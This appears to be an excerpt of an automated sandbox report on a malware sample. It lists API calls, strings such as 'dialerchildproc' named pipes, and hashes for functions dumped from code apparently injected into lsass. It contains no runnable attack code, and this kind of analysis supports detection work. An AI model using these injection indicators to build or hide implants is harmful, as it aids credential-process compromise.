                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: af5a5ce0cdbfeb3487fb4e6867138305428b7cfe6bc9de5e2f443df4e713f03d
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 1A81AF61700673EBF6D49B6F944939B22A0ABA7F80FB44025D90543796EF78C84DE703

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000002A29199CE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEBC
                                                                      • SetLastError.KERNEL32 ref: 000002A29199CED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000002A29199ECCC,?,?,?,?,000002A29199BF9F,?,?,?,?,?,000002A291997AB0), ref: 000002A29199CF2C
                                                                        • Part of subcall function 000002A29199D6CC: HeapAlloc.KERNEL32 ref: 000002A29199D721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF54
                                                                        • Part of subcall function 000002A29199D744: HeapFree.KERNEL32 ref: 000002A29199D75A
                                                                        • Part of subcall function 000002A29199D744: GetLastError.KERNEL32 ref: 000002A29199D764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 1aa138d20fc0b827cb1c5f57aa31ac61a2da1025fa63ea259488452dcac820d6
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: B6413D21341666C7FAE8677FDB5D36B61825B4FFB4F340624A936066DEDE28980D8202

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: c11dfa66158928d1978f00f7439df635ea03f4532b3de643d8087e6cdc08bdfe
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 18213036714661C3FB508B2AF64835B77A0F78AFA4FA00215DA5902AE8CF7CC18DCB01

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: 1ab0267fc7bca66e60e4a560c75babf12bbadfccf9fd62817e12a732324c591d
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 36E18B727007A6DBEBA08B6AD48939E77A0F747F98F200106EA8957B55CF34C09DD702

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 6c9b64aea459f5939bf3dd068a7343ba8d08770816b9b7ac5fa50ecb001ac872
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 29E18D76700761CBFBA08B2AD64839E77A0F75AB98F200115EE8957B99CF34C489C742
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 695a17d8ccce6949de6e16a908dae3d83cd48f590e0b0682d832d3bf9de70fad
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 1A41A422311A22D3FA95CB1FEA0C7576795B74FFE4F6941299D1A87788EE38C44D8302
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 1a33caf0f8baa57e1695812279deb1ee3f10c99bf09f8d6bf124dabded2f67c7
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: CA416D72214B95D7E7A0CF26E54839B77A1F38AF98F548129DA8A07758DF38C48DCB01
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 2eda56979e5e09bf1eaaea1a055d2580c86bac67b708ba4e2ae130481bc55e5c
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: C5113061704666C7FAE8573FE79937B61816B4FFE4F384224942A066DEDE28844D8202
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: f80ffc22932428fa4e3cbc88985e60adca33b6c3b2487c09d5e61210d3ffa293
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: EA819E21700263C7FAD8AB6FE64939B6690A78FF80F7444259A054779EDF38C84D8B53
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 5b077497e61e3eaf08f735d87a2babf30c03001d38dd30611cea9d9a8ed7bffa
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 1E31E521312622D3FE91DB8FE60875622A4B74EFA0F6905259D2E07398EF39D09DC302
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 23f971f6aa6706c2256635c771a537c12f52c91efb7c1af5dc6ceecc5ee62274
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: AB118E31310AA1C7F7908B1BF94831A66A0F38EFE4F644225EA2A877D4CF38C90C8741
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 78aa278ec88c86537f2b5306803016608d9432e31d0b705b3b66faa2d80037fb
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 3B115A2A304762C3FB949B2BE50826A62B0F74AF84F650028DE9907798EF2DC64DC705
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: 8e6775f4180294222f22188b8baa7f2f2ca9f794fb603b8fb577a7d6741249f2
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: FCD19C36205B99C2FAB09B1AE59435B77A0F38DF88F204116EA8D47B69DF3CC559CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: d9b6e3f3fbde7c1d9873550896ce399894800054be0f13c2b67ef489ea9a009b
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 7B319D22701B66C3FA94DF2BE64876B67A0FB4AF84F1840209E4847B59EF34D4AD8301
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 4a7941c75334ec3185a8439fab1463888cffeda500893dbf40a9a79e8ddde821
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: BD114F21341666C7FAE4573BE78D33B61925B5FFE4F3407249836476DEDE28840D8202
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 5a5af4342115806afc14c761473f91ccf1938b95f9de70327975ecfe1b508ef4
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: B4013521300A62C2FA949B5BA94835A63A1F78DFC4FA84035DE5A43798DE3CC98EC701
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 947c7fa1ad3ec27a09c19561f460c0d926b82a7c4141b4461b8e4805c66bb5eb
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: FD010965711762C7FBA49B2BE90C31B62B0BB4EF86F640428C95906794EF3DC14C8702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: e4074c3d989006062b1011126d9b052f5ce7c95440880c57faee1aa528616484
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 25517E72701622CBFBA48B1EE94CB5A2795F34AF88F648528DA564778CDF35C84DC702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 05c4583ffae46600bed06886ddadac808394b260982dfb2ad06563bfe6178556
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: E4F05E20704BA2C3FA808F2BBA0C11A6260AB4EFC0F648120EE5607B58DE28C54E8701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 532e30cbf3ed3c0db960dda60228f1adcd0baa93d67c2350fa8149c1815f2972
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 52F06261311A26C3FB548B2EE54D75B6320EB8FF61FA40219CA6B451E4DF2DC44DC302
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: a784433245ebc767c323d0d19b128198bb02bfc69fc0680bcae65617792c778e
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 6A02BC32219B95C7F7A0CB5AF55435BB7A0F389B94F204016EA8E87B69DF78C458CB01
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 6946616450a21ddfee37c7bd35f5e43c0242158b3216ae6897bbf5740372dcf2
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: D861AE76619A55C7F6A08B1AF54831B77A0F389B44F600116EA8E4BBA8DF7CC55CCF02
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 10a7772116927c9e5d22d35f01076c4d3e78c743838986f952f5529fbe920956
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: AB1186FA730A33F3FAD4151FE44D36711806F5AB74EE84629A966062D6CF28C44D4102
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 53c64429bb941cceb4271d550a9b971859a65673c9f7bb57f83dceafb3562638
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 3011C122B10A73D3F6E6556EE65D36711807B7FBB8F3C0A24A976076D6CE24D84C8203
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 1bbfd92db6e95b8fc9539b16fb8632b4a2ed3b6d0598b1e6c73ff1e62b443b6d
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: A8618F36700663E3FAE59A6FE54C32B6AA2E783F40F754415CA0A037A4DF34C94DA203
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: a73d1f298939c95b8273a44cc4430b5fd8c3e8e17c0158018733cb94f3254e73
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 50617636B01A95CBFB609F6AD68439E77A1F349B88F244215EE4917B98DF38D488C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: ae080d31f9a23d4b48301dcc4bdb2464afb26e9ddb5bb71d6685049e8a2a6eb7
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 5C51D0323042A2DBEBB18B5BA45835E77A0F356F84F285116DA8987BC5DF78C45CE702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 83ea0d018fee459cfa53da402ecaf07e370cce6283bd230a5add074b43673c95
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: BF519F7A2002A2CBFBA48B1BD68835A77A0F35AF95F244115DA5947BD9CF38D45CC702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
